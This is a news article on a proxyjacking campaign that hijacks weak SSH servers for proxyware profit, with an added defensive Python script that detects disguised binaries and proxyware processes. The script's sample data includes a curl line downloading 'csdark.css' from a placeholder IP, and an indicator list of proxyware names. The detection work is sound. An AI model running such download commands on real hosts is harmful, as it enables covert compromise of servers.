An active, financially motivated campaign is targeting vulnerable SSH servers to surreptitiously enlist them in proxy networks.
“This is an active campaign in which attackers leverage SSH for remote access, executing malicious scripts that surreptitiously register victim servers with peer-to-peer (P2P) proxy networks, such as Peer2Profit or Honeygain,” Akamai researcher Allen West said in Thursday’s report.
Unlike cryptojacking, in which compromised system resources are used to illegally mine cryptocurrencies, proxyjacking lets threat actors monetize a victim’s unused bandwidth by silently running proxyware services that turn the host into a P2P node.
This offers a two-fold advantage: the attacker monetizes the spare bandwidth with a fraction of the resource load that cryptojacking requires, and that lighter footprint also reduces the likelihood of discovery.
“This is a more stealthy alternative to cryptojacking and has serious implications that can increase the headaches that proxied Layer 7 attacks already serve,” West said.
Worse, the anonymity that proxyware services provide cuts both ways: bad actors can abuse it to obscure the source of their attacks by routing traffic through intermediate nodes.
Akamai, which discovered the most recent campaign on June 8, 2023, said the activity is designed to breach vulnerable SSH servers and deploy obfuscated Bash scripts which, in turn, fetch the necessary dependencies from compromised web servers, including the command-line tool curl, disguised as CSS files (“csdark.css”).
The script also stealthily seeks out and terminates competing instances of bandwidth-sharing services before launching a Docker service that shares the victim’s bandwidth for profit.
Further inspection of the web server revealed that it also hosts cryptocurrency miners, suggesting that the threat actors are engaged in both cryptojacking and proxyjacking.
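Two host-side checks that follow directly from the behaviour described above, written here as an added example (this is not Akamai’s code and not the campaign’s script): classify a downloaded “CSS” file by its magic bytes rather than its extension, so an ELF binary parked as csdark.css is flagged, and scan a process listing for the proxyware names the report mentions. The process lines, the ELF header bytes and the indicator list are constructed sample data and assumptions for illustration, not telemetry captured from a real host.

```python
"""Added example, not from the Akamai report: detect an executable disguised
with a text extension, and proxyware indicators in a process listing."""
from dataclasses import dataclass
from typing import List, Optional

# Leading-byte signatures fixed by the respective file formats. A curl
# binary served as "csdark.css" would carry the ELF prefix.
MAGIC = {
    b"\x7fELF": "ELF executable",
    b"#!": "script with shebang",
    b"\x1f\x8b": "gzip archive",
    b"PK\x03\x04": "zip archive",
}

# Substrings matched case-insensitively against each process line. The two
# proxyware names and the csdark.css filename come from the report; treat
# the list as a starting point to extend from your own telemetry.
PROCESS_INDICATORS = {
    "honeygain": "Honeygain proxyware",
    "peer2profit": "Peer2Profit proxyware",
    "csdark.css": "dropper artefact named in the report",
}

TEXT_EXTENSIONS = (".css", ".js", ".html", ".txt")


@dataclass
class Finding:
    source: str   # "file" or "process"
    detail: str


def classify_bytes(data: bytes) -> Optional[str]:
    """Return a file type label from the leading bytes, or None if unknown."""
    for sig, label in MAGIC.items():
        if data.startswith(sig):
            return label
    return None


def check_disguised_file(name: str, data: bytes) -> Optional[Finding]:
    """Flag a file whose text-like extension disagrees with its content."""
    kind = classify_bytes(data)
    if name.lower().endswith(TEXT_EXTENSIONS) and kind is not None:
        return Finding("file", f"{name} claims a text extension but is a {kind}")
    return None


def scan_process_listing(lines: List[str]) -> List[Finding]:
    """Return one Finding per ps/docker-ps style line that matches an indicator."""
    findings = []
    for line in lines:
        lowered = line.lower()
        for needle, label in PROCESS_INDICATORS.items():
            if needle in lowered:
                findings.append(Finding("process", f"{label}: {line.strip()}"))
                break  # one finding per line is enough
    return findings


# Constructed sample inputs (assumed, not captured from an incident).
SAMPLE_CSDARK = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 + b"\x02\x00\x3e\x00"
SAMPLE_REAL_CSS = b"body { margin: 0; }\n"
SAMPLE_PS = [
    "root  1204  0.0  0.1 ?  Ss  10:02  0:00 /usr/sbin/sshd -D",
    "root  2231  1.2  0.3 ?  Sl  10:03  0:05 docker run -d honeygain/honeygain -tou-accept -device srv01",
    "nobody 2248 0.5  0.2 ?  Sl  10:03  0:02 ./peer2profit_linux --email x",
    "root  2260  0.0  0.0 ?  S   10:04  0:00 curl -s -o /tmp/csdark.css http://203.0.113.5/csdark.css",
]


def run_checks() -> List[Finding]:
    """Run both checks over the constructed samples and collect findings."""
    findings = []
    for name, data in (("csdark.css", SAMPLE_CSDARK), ("site.css", SAMPLE_REAL_CSS)):
        hit = check_disguised_file(name, data)
        if hit is not None:
            findings.append(hit)
    findings.extend(scan_process_listing(SAMPLE_PS))
    return findings


if __name__ == "__main__":
    for f in run_checks():
        print(f"[{f.source}] {f.detail}")
```

On a real host, feed `check_disguised_file` the first few bytes of anything curl or wget wrote under /tmp or /dev/shm, and feed `scan_process_listing` the output of `ps aux` and `docker ps --no-trunc`; the magic-byte check is what catches the CSS disguise, since a filename-only rule is trivially evaded by renaming.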
While proxyware is not inherently malicious, Akamai notes that “some of these companies do not properly verify the source IP on the network, and even occasionally recommend that people install software on their work computers.”
But such operations cross into the realm of cybercrime when the apps are installed without users’ knowledge or consent, allowing threat actors to control multiple systems and generate illegitimate revenue.
“Old techniques are still effective, especially when paired with new results,” said West. “Standard security practices remain effective prevention mechanisms, including strong passwords, patch management, and careful logging.”